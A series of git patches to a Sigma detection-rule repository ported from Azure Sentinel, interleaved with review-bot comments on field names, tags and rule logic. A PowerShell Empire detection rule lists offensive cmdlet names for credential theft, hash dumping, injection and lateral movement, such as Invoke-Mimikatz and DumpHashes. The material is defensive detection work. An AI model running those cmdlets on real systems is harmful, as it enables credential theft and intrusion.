'Get-ServiceFilePermission' + - 'Get-ServicePermission' + - 'Invoke-ServiceUserAdd' + - 'Invoke-ServiceCMD' + - 'Write-UserAddServiceBinary' + - 'Write-CMDServiceBinary' + - 'Write-ServiceEXE' + - 'Write-ServiceEXECMD' + - 'Restore-ServiceEXE' + - 'Invoke-ServiceStart' + - 'Invoke-ServiceStop' + - 'Invoke-ServiceEnable' + - 'Invoke-ServiceDisable' + - 'Get-ServiceDetail' + - 'Find-DLLHijack' + - 'Find-PathHijack' + - 'Write-HijackDll' + - 'Get-RegAlwaysInstallElevated' + - 'Get-RegAutoLogon' + - 'Get-VulnAutoRun' + - 'Get-VulnSchTask' + - 
'Get-UnattendedInstallFile' + - 'Get-Webconfig' + - 'Get-ApplicationHost' + - 'Write-UserAddMSI' + - 'Invoke-AllChecks' + - 'Invoke-ThreadedFunction' + - 'Test-Login' + - 'Get-UserAgent' + - 'Test-Password' + - 'Get-ComputerDetails' + - 'Find-4648Logons' + - 'Find-4624Logons' + - 'Find-AppLockerLogs' + - 'Find-PSScriptsInPSAppLog' + - 'Find-RDPClientConnections' + - 'Get-SystemDNSServer' + - 'Invoke-Paranoia' + - 'Invoke-WinEnum{' + - 'Get-SPN' + - 'Invoke-ARPScan' + - 'Invoke-Portscan' + - 'Invoke-ReverseDNSLookup' + - 'Invoke-SMBScanner' + - 'New-InMemoryModule' + - 'Add-Win32Type' + - 'Export-PowerViewCSV' + - 'Get-MacAttribute' + - 'Copy-ClonedFile' + - 'Get-IPAddress' + - 'Convert-NameToSid' + - 'Convert-SidToName' + - 'Convert-NT4toCanonical' + - 'Get-Proxy' + - 'Get-PathAcl' + - 'Get-NameField' + - 'Convert-LDAPProperty' + - 'Get-NetDomainController' + - 'Add-NetUser' + - 'Add-NetGroupUser' + - 'Get-UserProperty' + - 'Find-UserField' + - 'Get-UserEvent' + - 'Get-ObjectAcl' + - 'Add-ObjectAcl' + - 'Invoke-ACLScanner' + - 'Get-GUIDMap' + - 'Get-ADObject' + - 'Set-ADObject' + - 'Get-ComputerProperty' + - 'Find-ComputerField' + - 'Get-NetOU' + - 'Get-NetSite' + - 'Get-NetSubnet' + - 'Get-DomainSID' + - 'Get-NetGroup' + - 'Get-NetFileServer' + - 'SplitPath' + - 'Get-DFSshare' + - 'Get-DFSshareV1' + - 'Get-DFSshareV2' + - 'Get-GptTmpl' + - 'Get-GroupsXML' + - 'Get-NetGPO' + - 'Get-NetGPOGroup' + - 'Find-GPOLocation' + - 'Find-GPOComputerAdmin' + - 'Get-DomainPolicy' + - 'Get-NetLocalGroup' + - 'Get-NetShare' + - 'Get-NetLoggedon' + - 'Get-NetSession' + - 'Get-NetRDPSession' + - 'Invoke-CheckLocalAdminAccess' + - 'Get-LastLoggedOn' + - 'Get-NetProcess' + - 'Find-InterestingFile' + - 'Invoke-CheckWrite' + - 'Invoke-UserHunter' + - 'Invoke-StealthUserHunter' + - 'Invoke-ProcessHunter' + - 'Invoke-EventHunter' + - 'Invoke-ShareFinder' + - 'Invoke-FileFinder' + - 'Find-LocalAdminAccess' + - 'Get-ExploitableSystem' + - 'Invoke-EnumerateLocalAdmin' + - 
'Get-NetDomainTrust' + - 'Get-NetForestTrust' + - 'Find-ForeignUser' + - 'Find-ForeignGroup' + - 'Invoke-MapDomainTrust' + - 'Get-Hex' + - 'Create-RemoteThread' + - 'Get-FoxDump' + - 'Decrypt-CipherText' + - 'Get-Screenshot' + - 'Start-HTTP-Server' + - 'Local:Invoke-CreateRemoteThread' + - 'Local:Get-Win32Functions' + - 'Local:Inject-NetRipper' + - 'GetCommandLine' + - 'ElevatePrivs' + - 'Get-RegKeyClass' + - 'Get-BootKey' + - 'Get-HBootKey' + - 'Get-UserName' + - 'Get-UserHashes' + - 'DecryptHashes' + - 'DecryptSingleHash' + - 'Get-UserKeys' + - 'DumpHashes' + - 'Enable-SeAssignPrimaryTokenPrivilege' + - 'Enable-Privilege' + - 'Set-DesktopACLs' + - 'Set-DesktopACLToAllowEveryone' + - 'Get-PrimaryToken' + - 'Get-ThreadToken' + - 'Get-TokenInformation' + - 'Get-UniqueTokens' + - 'Find-GPOLocation' + - 'Find-GPOComputerAdmin' + - 'Get-DomainPolicy' + - 'Get-NetLocalGroup' + - 'Get-NetShare' + - 'Get-NetLoggedon' + - 'Get-NetSession' + - 'Get-NetRDPSession' + - 'Invoke-CheckLocalAdminAccess' + - 'Get-LastLoggedOn' + - 'Get-NetProcess' + - 'Find-InterestingFile' + - 'Invoke-CheckWrite' + - 'Invoke-UserHunter' + - 'Invoke-StealthUserHunter' + - 'Invoke-ProcessHunter' + - 'Invoke-EventHunter' + - 'Invoke-ShareFinder' + - 'Invoke-FileFinder' + - 'Find-LocalAdminAccess' + - 'Get-ExploitableSystem' + - 'Invoke-EnumerateLocalAdmin' + - 'Get-NetDomainTrust' + - 'Get-NetForestTrust' + - 'Find-ForeignUser' + - 'Find-ForeignGroup' + - 'Invoke-MapDomainTrust' + - 'Get-Hex' + - 'Create-RemoteThread' + - 'Get-FoxDump' + - 'Decrypt-CipherText' + - 'Get-Screenshot' + - 'Start-HTTP-Server' + - 'Local:Invoke-CreateRemoteThread' + - 'Local:Get-Win32Functions' + - 'Local:Inject-NetRipper' + - 'GetCommandLine' + - 'ElevatePrivs' + - 'Get-RegKeyClass' + - 'Get-BootKey' + - 'Get-HBootKey' + - 'Get-UserName' + - 'Get-UserHashes' + - 'DecryptHashes' + - 'DecryptSingleHash' + - 'Get-UserKeys' + - 'DumpHashes' + - 'Enable-SeAssignPrimaryTokenPrivilege' + - 'Enable-Privilege' + - 
'Set-DesktopACLs' + - 'Set-DesktopACLToAllowEveryone' + - 'Get-PrimaryToken' + - 'Get-ThreadToken' + - 'Get-TokenInformation' + - 'Get-UniqueTokens' + - 'Invoke-ImpersonateUser' + - 'Create-ProcessWithToken' + - 'Free-AllTokens' + - 'Enum-AllTokens' + - 'Invoke-RevertToSelf' + - 'Set-Speaker(\$Volume){\$wshShell' + - 'Local:Get-RandomString' + - 'Local:Invoke-PsExecCmd' + - 'Get-GPPPassword' + - 'Local:Inject-BypassStuff' + - 'Local:Invoke-CopyFile\(\$sSource,' + - 'ind-Fruit' + - 'New-IPv4Range' + - 'New-IPv4RangeFromCIDR' + - 'Parse-Hosts' + - 'Parse-ILHosts' + - 'Exclude-Hosts' + - 'Get-TopPort' + - 'Parse-Ports' + - 'Parse-IpPorts' + - 'Remove-Ports' + - 'Write-PortscanOut' + - 'Convert-SwitchtoBool' + - 'Get-ForeignUser' + - 'Get-ForeignGroup' + condition: selection1 or selection2 \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml new file mode 100644 index 00000000..d827a04c --- /dev/null +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -0,0 +1,25 @@ +title: Account added and removed from privileged groups +id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 +description: 'Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.' +references: Azure Sentinel +level: Low +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098 + - attack.t1078 +detection: + selection1: + EventID: + - 4728 + - 4732 + - 4756 + selection2: + EventID: + - 4729 + - 4733 + - 4757 + condition: selection1 or selection2 diff --git a/rules/windows/builtin/win_user_acc_created_deleted.yml b/rules/windows/builtin/win_user_acc_created_deleted.yml new file mode 100644 index 00000000..48bd4be5 --- /dev/null +++ b/rules/windows/builtin/win_user_acc_created_deleted.yml 
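Review bot: `selection2` in `win_powershelll_empire.yml` uses `CommandLine:` without a modifier, which is an exact whole-value match, so an entry such as `'Invoke-Mimikatz'` only fires when the entire command line equals that token — in practice never; it needs `CommandLine|contains:` as `selection1` already uses. The list also repeats a large block (`'Find-GPOLocation'` through `'Get-UniqueTokens'` appears twice), contains the truncated `'ind-Fruit'`, a stray brace in `'Invoke-WinEnum{'`, and regex-style escapes such as `'Set-Speaker(\$Volume){\$wshShell'` that a plain string match treats literally. Deduplicating and fixing those entries would make the 363-line list both smaller and accurate, and the filename's `powershelll` typo should go in the same pass.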
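Review bot: The description of `win_user_acc_added_removed.yml` promises accounts "added to privileged group and then quickly removed", but `condition: selection1 or selection2` fires on any single 4728/4732/4756 or 4729/4733/4757 event, and Sigma's condition language cannot express the add-then-remove sequence the Sentinel original correlates. `win_user_acc_created_deleted.yml`, `win_user_acc_enabled_disabled.yml` and `win_user_created_added_to_bultin_admins.yml` in the following hunks have the same gap (the first matches only 4720, so its "deleted within 10 mins" never enters into it). Each description should state what the rule actually alerts on, and `level` should reflect a single-event signal.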
@@ -0,0 +1,18 @@ +title: User account created and deleted within 10 mins +id: 4b93c5af-d20b-4236-b696-a28b8c51407f +description: 'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and + an adversary attempting to hide in the noise.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098 + - attack.t1078 +detection: + selection: + EventID: 4720 + condition: selection \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml new file mode 100644 index 00000000..91559202 --- /dev/null +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml @@ -0,0 +1,20 @@ +title: User account enabled and disabled +id: 3d023f64-8225-41a2-9570-2bd7c2c4535e +description: 'Identifies when a user account is enabled and then disabled. This can be an indication of compromise and + an adversary attempting to hide in the noise.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098 + - attack.t1078 +detection: + selection: + EventID: + - 4722 + - 4725 + condition: selection diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml new file mode 100644 index 00000000..831dfea2 --- /dev/null +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml 
@@ -0,0 +1,21 @@ +title: New user created and added to the built-in administrators group +id: aa1eff90-29d4-49dc-a3ea-b65199f516db +description: 'Identifies when a user account was created and then added to the builtin Administrators group. + This should be monitored closely and all additions reviewed.' +references: Azure Sentinel +level: Low +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation +relevantTechniques: + - attack.t1098 + - attack.t1078 +detection: + selection: + EventID: + - 4720 + - 4732 + condition: selection \ No newline at end of file From 12396f615c9f0528c8dc028a8317892fd1a389cc Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 16:52:24 +0200 Subject: [PATCH 0353/1367] remove duplicate rule and fix errors --- ...creating_number_of_resources_detection.yml} | 0 rules/network/zeek/zeek_dns_mining_pools.yml | 5 ++--- rules/network/zeek/zeek_dns_torproxy.yml | 2 +- .../builtin/win_anomaly_process_execution.yml | 5 ++--- .../windows/builtin/win_event_log_cleared.yml | 2 +- .../windows/builtin/win_powershelll_empire.yml | 10 ++++------ .../builtin/win_user_acc_added_removed.yml | 2 +- .../builtin/win_user_acc_created_deleted.yml | 18 ------------------ .../builtin/win_user_acc_enabled_disabled.yml | 2 +- ...win_user_created_added_to_bultin_admins.yml | 2 +- 10 files changed, 13 insertions(+), 35 deletions(-) rename rules/cloud/azure/{azure_creating_number_of_resources_detection.yaml => azure_creating_number_of_resources_detection.yml} (100%) delete mode 100644 rules/windows/builtin/win_user_acc_created_deleted.yml diff --git a/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml b/rules/cloud/azure/azure_creating_number_of_resources_detection.yml similarity index 100% rename from rules/cloud/azure/azure_creating_number_of_resources_detection.yaml rename to rules/cloud/azure/azure_creating_number_of_resources_detection.yml 
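Review bot: `relevantTechniques:` in `win_user_created_added_to_bultin_admins.yml` is an Azure Sentinel rule key, not a Sigma one, so `attack.t1098` and `attack.t1078` listed under it are ignored by Sigma tooling and the rule ends up tagged with tactics only; move the two entries under `tags`. The filename also misspells "builtin" as `bultin`.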
diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml
index f45df340..281e3779 100644
--- a/rules/network/zeek/zeek_dns_mining_pools.yml
+++ b/rules/network/zeek/zeek_dns_mining_pools.yml
@@ -1,10 +1,9 @@
 id: bf74135c-18e8-4a72-a926-0e4f47888c19
 title: DNS events related to mining pools
-description: |
- 'Identifies IPs that may be performing DNS lookups associated with common currency mining pools.'
+description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools.
 reference: Azure Sentinel
 author: Saw Winn Naung
-severity: Medium
+severity: medium
 logsource:
 service: dns
 product: zeek
diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml
index 1249c6ad..6a3e8a77 100644
--- a/rules/network/zeek/zeek_dns_torproxy.yml
+++ b/rules/network/zeek/zeek_dns_torproxy.yml
@@ -4,7 +4,7 @@ description: |
 'Identifies IPs performing DNS lookups associated with common Tor proxies.'
 reference: Azure Sentinel
 author: Saw Winn Naung
-severity: Medium
+severity: medium
 logsource:
 service: dns
 product: zeek
diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml
index 1a38f02a..2746bf8f 100644
--- a/rules/windows/builtin/win_anomaly_process_execution.yml
+++ b/rules/windows/builtin/win_anomaly_process_execution.yml
@@ -2,16 +2,15 @@ title: Process execution anomaly
 id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8
 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.'
 references: Azure Sentinel
-level: Medium
+level: medium
 logsource:
- service: Security
 product: windows
+ category: process_creation
 tags:
 - attack.execution
 - attack.t1064
 detection:
 selection:
- EventID: 4688
 NewProcessName|contains:
 - 'powershell.exe'
 - 'cmd.exe'
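Review bot: The switch to `category: process_creation` in `win_anomaly_process_execution.yml` keeps `NewProcessName|contains` in the selection, but the process_creation taxonomy names the executable `Image` — `NewProcessName` is the raw Security 4688 field and is not what backend field mappings for this category translate, so the rule is unlikely to match once 4688 is no longer the explicit source. `Image|endswith:` with the same values is the idiomatic form and would also stop `'cmd.exe'` matching on arbitrary path components.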
diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml
index 2540d98e..ac7e1691 100644
--- a/rules/windows/builtin/win_event_log_cleared.yml
+++ b/rules/windows/builtin/win_event_log_cleared.yml
@@ -5,7 +5,7 @@ description: |
 'Checks for event id 1102 which indicates the security event log was cleared.'
 reference: Azure Sentinel
 author: Saw Winn Naung
-severity: Medium
+severity: medium
 logsource:
 service: security
 product: windows
diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml
index f3883029..e4883f3e 100644
--- a/rules/windows/builtin/win_powershelll_empire.yml
+++ b/rules/windows/builtin/win_powershelll_empire.yml
@@ -1,19 +1,17 @@
 title: Powershell Empire cmdlets seen in command line
 id: ef88eb96-861c-43a0-ab16-f3835a97c928
-description: |
- 'Identifies instances of PowerShell Empire cmdlets in powershell process command line data.'
+description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data.
 references: Azure Sentinel
-level: Medium
+level: medium
 logsource:
- service: Security
- product: windows
+ product: windows
+ category: process_creation
 tags:
 - attack.execution
 - attack.persistence
 - attack.t1208
 detection:
 selection1:
- EventID: 4688
 CommandLine|contains: ' -encodedCommand'
 selection2:
 CommandLine:
diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml
index d827a04c..e3fe87b9 100644
--- a/rules/windows/builtin/win_user_acc_added_removed.yml
+++ b/rules/windows/builtin/win_user_acc_added_removed.yml
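Review bot: `selection1` in `win_powershelll_empire.yml` still consists of only `CommandLine|contains: ' -encodedCommand'` and the file's condition `selection1 or selection2` (below this hunk) OR-s it with the cmdlet list, so after the move to `category: process_creation` every encoded PowerShell invocation raises an "Empire cmdlets" alert regardless of its content. Either AND the encoded-command clause with the cmdlet list or drop it here in favour of a separate generic encoded-command rule, and say so in the description.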
@@ -2,7 +2,7 @@ title: Account added and removed from privileged groups
 id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60
 description: 'Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.'
 references: Azure Sentinel
-level: Low
+level: low
 logsource:
   service: Security
   product: windows
diff --git a/rules/windows/builtin/win_user_acc_created_deleted.yml b/rules/windows/builtin/win_user_acc_created_deleted.yml
deleted file mode 100644
index 48bd4be5..00000000
--- a/rules/windows/builtin/win_user_acc_created_deleted.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-title: User account created and deleted within 10 mins
-id: 4b93c5af-d20b-4236-b696-a28b8c51407f
-description: 'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and
-  an adversary attempting to hide in the noise.'
-references: Azure Sentinel
-level: Medium
-logsource:
-  service: Security
-  product: windows
-tags:
-  - attack.persistence
-  - attack.privilege_escalation
-  - attack.t1098
-  - attack.t1078
-detection:
-  selection:
-    EventID: 4720
-  condition: selection
\ No newline at end of file
diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml
index 91559202..a6cd343c 100644
--- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml
+++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml
@@ -3,7 +3,7 @@ id: 3d023f64-8225-41a2-9570-2bd7c2c4535e
 description: 'Identifies when a user account is enabled and then disabled. This can be an indication of compromise and
   an adversary attempting to hide in the noise.'
 references: Azure Sentinel
-level: Medium
+level: medium
 logsource:
   service: Security
   product: windows
diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
index 831dfea2..639debc5 100644
--- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
+++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml
@@ -3,7 +3,7 @@ id: aa1eff90-29d4-49dc-a3ea-b65199f516db
 description: 'Identifies when a user account was created and then added to the builtin Administrators group.
   This should be monitored closely and all additions reviewed.'
 references: Azure Sentinel
-level: Low
+level: low
 logsource:
   service: Security
   product: windows

From 245cb6d5101ee8f024eb75747f4ad6f682da85a1 Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 15 Aug 2021 18:55:44 +0200
Subject: [PATCH 0354/1367] fix more errors

---
 rules/network/zeek/zeek_dns_mining_pools.yml | 6 +-
 rules/network/zeek/zeek_dns_torproxy.yml | 9 +-
 rules/web/xss_keywords.yml | 4 +-
 .../builtin/win_anomaly_process_execution.yml | 6 +-
 .../windows/builtin/win_event_log_cleared.yml | 10 +-
 .../builtin/win_powershelll_empire.yml | 635 ++++++++----------
 .../builtin/win_user_acc_added_removed.yml | 6 +-
 .../builtin/win_user_acc_enabled_disabled.yml | 7 +-
 ...in_user_created_added_to_bultin_admins.yml | 7 +-
 9 files changed, 323 insertions(+), 367 deletions(-)

diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml
index 281e3779..0de24200 100644
--- a/rules/network/zeek/zeek_dns_mining_pools.yml
+++ b/rules/network/zeek/zeek_dns_mining_pools.yml
@@ -1,9 +1,11 @@
 id: bf74135c-18e8-4a72-a926-0e4f47888c19
 title: DNS events related to mining pools
 description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools.
-reference: Azure Sentinel
+references:
+  - Azure Sentinel
+date: 2021/08/15
 author: Saw Winn Naung
-severity: medium
+level: medium
 logsource:
   service: dns
   product: zeek
diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml
index 6a3e8a77..466ab203 100644
--- a/rules/network/zeek/zeek_dns_torproxy.yml
+++ b/rules/network/zeek/zeek_dns_torproxy.yml
@@ -1,10 +1,11 @@
 id: a8322756-015c-42e7-afb1-436e85ed3ff5
 title: DNS tor proxies
-description: |
-  'Identifies IPs performing DNS lookups associated with common Tor proxies.'
-reference: Azure Sentinel
+description: Identifies IPs performing DNS lookups associated with common Tor proxies.
+references:
+  - Azure Sentinel
+date: 2021/08/15
 author: Saw Winn Naung
-severity: medium
+level: medium
 logsource:
   service: dns
   product: zeek
diff --git a/rules/web/xss_keywords.yml b/rules/web/xss_keywords.yml
index 2c17f38b..775ec871 100644
--- a/rules/web/xss_keywords.yml
+++ b/rules/web/xss_keywords.yml
@@ -1,9 +1,9 @@
 title: Detect XSS Attempts by keywords
-id: 553a450b8-604d-41a9-8587-a28334aaddfb
+id: 65354b83-a2ea-4ea6-8414-3ab38be0d409
 status: experimental
 description: Detects XSS that use GET requests by keyword searches in URL strings
 author: Saw Win Naung
-date: 2020/02/22
+date: 2021/08/15
 logsource:
   category: webserver
 detection:
diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml
index 2746bf8f..176d64bd 100644
--- a/rules/windows/builtin/win_anomaly_process_execution.yml
+++ b/rules/windows/builtin/win_anomaly_process_execution.yml
@@ -1,7 +1,9 @@
-title: Process execution anomaly
+title: Process Execution Anomaly
 id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8
 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.'
-references: Azure Sentinel
+references:
+  - Azure Sentinel
+date: 2021/08/15
 level: medium
 logsource:
   product: windows
diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml
index ac7e1691..0fdbdd54 100644
--- a/rules/windows/builtin/win_event_log_cleared.yml
+++ b/rules/windows/builtin/win_event_log_cleared.yml
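Review bot: `date` in a Sigma rule is the creation date, so replacing `2020/02/22` with `2021/08/15` in xss_keywords.yml discards the rule's provenance; keep `date: 2020/02/22` and record the edit as `modified: 2021/08/15`. Replacing the `id` is unavoidable because `553a450b8-...` is not a valid UUID, but any consumer keyed on the old id (tuning, suppressions, dashboards) silently loses its link to the rule, so the old id should at least be named in the commit message or a `related` entry. The `date: 2021/08/15` newly added to the other rules in this commit likewise records the port date rather than when the detections were written.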
@@ -1,16 +1,16 @@ id: a122ac13-daf8-4175-83a2-72c387be339d title: Security Event log cleared status: experimental -description: | - 'Checks for event id 1102 which indicates the security event log was cleared.' -reference: Azure Sentinel +description: Checks for event id 1102 which indicates the security event log was cleared. +references: + - Azure Sentinel +date: 2021/08/15 author: Saw Winn Naung -severity: medium +level: medium logsource: service: security product: windows tags: - - attack.t1107 detection: selection: diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml index e4883f3e..8aa638ef 100644 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -1,7 +1,9 @@ title: Powershell Empire cmdlets seen in command line id: ef88eb96-861c-43a0-ab16-f3835a97c928 description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. -references: Azure Sentinel +references: + - Azure Sentinel +date: 2021/08/15 level: medium logsource: product: windows 
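Review bot: Dropping `- attack.t1107` leaves `tags:` with no entries, which YAML loads as null rather than an empty list, and the rule loses its only ATT&CK mapping. T1107 (File Deletion) was the wrong technique for log clearing anyway; the current mapping for event 1102 is `- attack.defense_evasion` and `- attack.t1070.001` (Indicator Removal: Clear Windows Event Logs), so put those two entries under `tags:`. `references: - Azure Sentinel` is a product name rather than a URL; a link to the query this rule was ported from would let a reviewer check the 1102 filter. The detection body and condition are outside this hunk.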
@@ -15,347 +17,292 @@ detection: CommandLine|contains: ' -encodedCommand' selection2: CommandLine: - - 'SetDelay' - - 'GetDelay' - - 'Set-LostLimit' - - 'Get-LostLimit' - - 'Set-Killdate' - - 'Get-Killdate' - - 'Set-WorkingHours' - - 'Get-WorkingHours' - - 'Get-Sysinfo' - - 'Add-Servers' - - 'Invoke-ShellCommand' - - 'Start-AgentJob' - - 'Update-Profile' - - 'Get-FilePart' - - 'Encrypt-Bytes' - - 'Decrypt-Bytes' - - 'Encode-Packet' - - 'Decode-Packet' - - 'Send-Message' - - 'Process-Packet' - - 'Process-Tasking' - - 'Get-Task' - - 'Start-Negotiate' - - 'Invoke-DllInjection' - - 'Invoke-ReflectivePEInjection' - - 'Invoke-Shellcode' - - 'Invoke-ShellcodeMSIL' - - 'Get-ChromeDump' - - 'Get-ClipboardContents' - - 'Get-IndexedItem' - - 'Get-Keystrokes' - - 'Invoke-Inveigh' - - 'Invoke-NetRipper' - - 'local:Invoke-PatchDll' - - 'Invoke-NinjaCopy' - - 'Get-Win32Types' - - 'Get-Win32Constants' - - 'Get-Win32Functions' - - 'Sub-SignedIntAsUnsigned' - - 'Add-SignedIntAsUnsigned' - - 'Compare-Val1GreaterThanVal2AsUInt' - - 'Convert-UIntToInt' - - 'Test-MemoryRangeValid' - - 'Write-BytesToMemory' - - 'Get-DelegateType' - - 'Get-ProcAddress' - - 'Enable-SeDebugPrivilege' - - 'Invoke-CreateRemoteThread' - - 'Get-ImageNtHeaders' - - 'Get-PEBasicInfo' - - 'Get-PEDetailedInfo' - - 'Import-DllInRemoteProcess' - - 'Get-RemoteProcAddress' - - 'Copy-Sections' - - 'Update-MemoryAddresses' - - 'Import-DllImports' - - 'Get-VirtualProtectValue' - - 'Update-MemoryProtectionFlags' - - 'Update-ExeFunctions' - - 'Copy-ArrayOfMemAddresses' - - 'Get-MemoryProcAddress' - - 'Invoke-MemoryLoadLibrary' - - 'Invoke-MemoryFreeLibrary' - - 'Out-Minidump' - - 'Get-VaultCredential' - - 'Invoke-DCSync' - - 'Translate-Name' - - 'Get-NetDomain' - - 'Get-NetForest' - - 'Get-NetForestDomain' - - 'Get-DomainSearcher' - - 'Get-NetComputer' - - 'Get-NetGroupMember' - - 'Get-NetUser' - - 'Invoke-Mimikatz' - - 'Invoke-PowerDump' - - 'Invoke-TokenManipulation' - - 'Exploit-JMXConsole' - - 'Exploit-JBoss' - - 
'Invoke-Thunderstruck' - - 'Invoke-VoiceTroll' - - 'Set-WallPaper' - - 'Invoke-PsExec' - - 'Invoke-SSHCommand' - - 'Invoke-PSInject' - - 'Invoke-RunAs' - - 'Invoke-SendMail' - - 'Invoke-Rule' - - 'Get-OSVersion' - - 'Select-EmailItem' - - 'View-Email' - - 'Get-OutlookFolder' - - 'Get-EmailItems' - - 'Invoke-MailSearch' - - 'Get-SubFolders' - - 'Get-GlobalAddressList' - - 'Invoke-SearchGAL' - - 'Get-SMTPAddress' - - 'Disable-SecuritySettings' - - 'Reset-SecuritySettings' - - 'Get-OutlookInstance' - - 'New-HoneyHash' - - 'Set-MacAttribute' - - 'Invoke-PatchDll' - - 'Get-SecurityPackages' - - 'Install-SSP' - - 'Invoke-BackdoorLNK' - - 'New-ElevatedPersistenceOption' - - 'New-UserPersistenceOption' - - 'Add-Persistence' - - 'Invoke-CallbackIEX' - - 'Add-PSFirewallRules' - - 'Invoke-EventLoop' - - 'Invoke-PortBind' - - 'Invoke-DNSLoop' - - 'Invoke-PacketKnock' - - 'Invoke-CallbackLoop' - - 'Invoke-BypassUAC' - - 'Get-DecryptedCpassword' - - 'Get-GPPInnerFields' - - 'Invoke-WScriptBypassUAC' - - 'Get-ModifiableFile' - - 'Get-ServiceUnquoted' - - 'Get-ServiceFilePermission' - - 'Get-ServicePermission' - - 'Invoke-ServiceUserAdd' - - 'Invoke-ServiceCMD' - - 'Write-UserAddServiceBinary' - - 'Write-CMDServiceBinary' - - 'Write-ServiceEXE' - - 'Write-ServiceEXECMD' - - 'Restore-ServiceEXE' - - 'Invoke-ServiceStart' - - 'Invoke-ServiceStop' - - 'Invoke-ServiceEnable' - - 'Invoke-ServiceDisable' - - 'Get-ServiceDetail' - - 'Find-DLLHijack' - - 'Find-PathHijack' - - 'Write-HijackDll' - - 'Get-RegAlwaysInstallElevated' - - 'Get-RegAutoLogon' - - 'Get-VulnAutoRun' - - 'Get-VulnSchTask' - - 'Get-UnattendedInstallFile' - - 'Get-Webconfig' - - 'Get-ApplicationHost' - - 'Write-UserAddMSI' - - 'Invoke-AllChecks' - - 'Invoke-ThreadedFunction' - - 'Test-Login' - - 'Get-UserAgent' - - 'Test-Password' - - 'Get-ComputerDetails' - - 'Find-4648Logons' - - 'Find-4624Logons' - - 'Find-AppLockerLogs' - - 'Find-PSScriptsInPSAppLog' - - 'Find-RDPClientConnections' - - 'Get-SystemDNSServer' - - 
'Invoke-Paranoia' - - 'Invoke-WinEnum{' - - 'Get-SPN' - - 'Invoke-ARPScan' - - 'Invoke-Portscan' - - 'Invoke-ReverseDNSLookup' - - 'Invoke-SMBScanner' - - 'New-InMemoryModule' - - 'Add-Win32Type' - - 'Export-PowerViewCSV' - - 'Get-MacAttribute' - - 'Copy-ClonedFile' - - 'Get-IPAddress' - - 'Convert-NameToSid' - - 'Convert-SidToName' - - 'Convert-NT4toCanonical' - - 'Get-Proxy' - - 'Get-PathAcl' - - 'Get-NameField' - - 'Convert-LDAPProperty' - - 'Get-NetDomainController' - - 'Add-NetUser' - - 'Add-NetGroupUser' - - 'Get-UserProperty' - - 'Find-UserField' - - 'Get-UserEvent' - - 'Get-ObjectAcl' - - 'Add-ObjectAcl' - - 'Invoke-ACLScanner' - - 'Get-GUIDMap' - - 'Get-ADObject' - - 'Set-ADObject' - - 'Get-ComputerProperty' - - 'Find-ComputerField' - - 'Get-NetOU' - - 'Get-NetSite' - - 'Get-NetSubnet' - - 'Get-DomainSID' - - 'Get-NetGroup' - - 'Get-NetFileServer' - - 'SplitPath' - - 'Get-DFSshare' - - 'Get-DFSshareV1' - - 'Get-DFSshareV2' - - 'Get-GptTmpl' - - 'Get-GroupsXML' - - 'Get-NetGPO' - - 